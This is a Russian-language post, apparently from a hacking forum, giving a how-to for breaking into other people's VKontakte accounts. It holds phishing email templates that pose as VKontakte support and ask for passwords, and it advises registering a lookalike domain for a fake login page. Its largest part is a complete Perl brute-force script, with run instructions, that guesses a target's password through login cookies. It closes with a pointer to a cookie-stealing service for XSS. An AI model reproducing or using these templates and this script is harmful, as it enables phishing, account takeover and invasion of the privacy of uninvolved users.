Пишет
Ageнт членS
Взлом в контакте
В данный момент очень популярны, стали соц. сети. В этой статье мы рассмотрим одну из них vkontakte.ru.Очень много людей просят взломать страницу, из своих личных побуждений.Над такими проектами работают профессионалы, и найти баг уже в состоявшем проекте почти нереально, но всё же редко что то всплывает и поэтому новичку, который нечего не знает, взломать будет НЕРЕАЛЬНО в любом случаи, потому что там сидят далеко не тупые люди и ни кто вам бесплатно помогать, так что смиритесь.Для тех, кто понимает, о чёмя, продолжаем.ID это как уник. код юзера, то есть, например серийный номер машины.Узнать его вы можете, зайдя в вконтакт, например, так выгладит ваша главная страница профиля http://vkontakte.ru/id5185**6?31892ID получится 5185**6, то есть, то, что начинается от id и то знака ?. Если нету знака ? то идёт до конца.Некоторые способы взлома:1) Email + СИ-> Пишем анонимное письмо, с указанием отправителя, к примеру "support@vkontakte.ru", "admin@vkontakte.ru", с текстом типа"Здравствуйте.В связи с очень высоким количеством пользователей в нашей системе,идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо,вам необходимо на него ответить в такой форме:EM: Ваш email в vkontakte.ru. PA: Ваш пароль в vkontakte.ru.Пример:EM: pavel_durov@mail.ru PA:123456Чтоб не было путаницы, в теме письма укажите тему "Обновление".Приносим извинения за неудобства.".Или типа этого, импровизируйте .2) Фейк (обман), просто покупаете домен (к примеру, vkontaktte.ru) максимально похожий на vkontakte.ru, например разница в одной букве, и на него сливаете готовый фейк, его возьмете .Тут. Vkontакте.zip 3) Email + фейк, Опять же пишем анонимное письмо, но на этот раз наша цель заманить пользователя на фейк, и чтоб он ввёл данные.Отправитель, к примеру "support@vkontakte.ru", "admin@vkontakte.ru", с текстом типа"Здравствуйте.В связи с очень высоким количеством пользователей в нашей системе,идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо.В течение недели вамнужно зайти в систему vkontaktte.ru, и вы будите автоматически занесены, а список активных.Приносим извинения за неудобства.".Или типа этого, импровизируйте .4) Использовать брутфорсы, ищите в поисковиках, вот например брутфорс на PERL.Vkontakte.Ru Brute [FinaL]Брутфорс акков вконтакте.ру Сам скрипт брута (Perl):#!/usr/bin/perluse IO::Socket;use MD5;use threads;use threads::shared;my @pass : shared; ####################################### C!klodoL# vkontakte.ru bruteforce with multi-threads ###################################### $dic = 'passl.txt'; #словарь паролей$id = 111111; #id цели$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40$threads = 4; #количество потоков###################################### open (pass, "<$dic");Next:@pass = pass();for(0..$threads) {$trl[$_] = threads->create(&Brut, $_);}for(@trl) { $_->join; }sub Brut{while (@pass){$pass = shift @pass;$md5 = MD5->hexhash($pass);$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPor t=>80);print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n"."Host: vkontakte.ru\r\n"."Accept: */*\r\n"."Content-Type:application/x-www-form-urlencoded\r\n"."User-Agent: Mozillo\r\n"."Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n"."Connection: close\r\n\r\n";$answ = <$sock>;close $sock;print "$pass $answ";if ($answ =~ /302/){open (good, '>>good.txt');print good "$id:$pass:$md5\n";print "$id:$pass:$md5\n";close good;exit;}}}goto Next;sub pass{my (@mas);while (<pass>){push @mas, $_;last if (@mas == 400);}chomp @mas;return @mas;} --------------------------------------------------------------------------------:-------------------------------------------------------------------------------- $dic = 'passl.txt'; #словарь паролей$id = 111111; #id цели$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40$threads = 4; #количество потоков -------------------------------------------------------------------------------- Как запустить скрипт: -------------------------------------------------------------------------------- 1. Качаем прогу ActivePerl 5.10.0.1001 или более раннюю версию. 2. копируем текст в текстовый файл из кода выше... меняем id и мыло жертвы на нужное ,сохраняем как brut.txt3. переименовываем файл из brute.txt в brute.pl4. туда где лежит этот файл, копируем файл со словарём, обзывая его passl.txt5. запускаем файл, и радуемся... 6. создастся good.txt, где и будет ваш пасс. Vkontakte bruteforce ©serber vkontakte_bruteforce.rar[79.6 Kb) или vkontakte.exe[111.5 Kb] так же Словари . 5) Искать уязвимости, тобишь активные XSS и SQl, для кражи кук используйте na-s.ru. Такие уязвимости очень дорого стоят, и выкладывать их нет смысла просить, тем более паблик уязвимости проживут сутки не более.Ну, вот мы рассмотрели 5 способов,как можно взломать страницу вконтакте.Если до сих пор не поняли,не судьба
Лучше мирно сидите дальше в контакте...Таги: Взлом
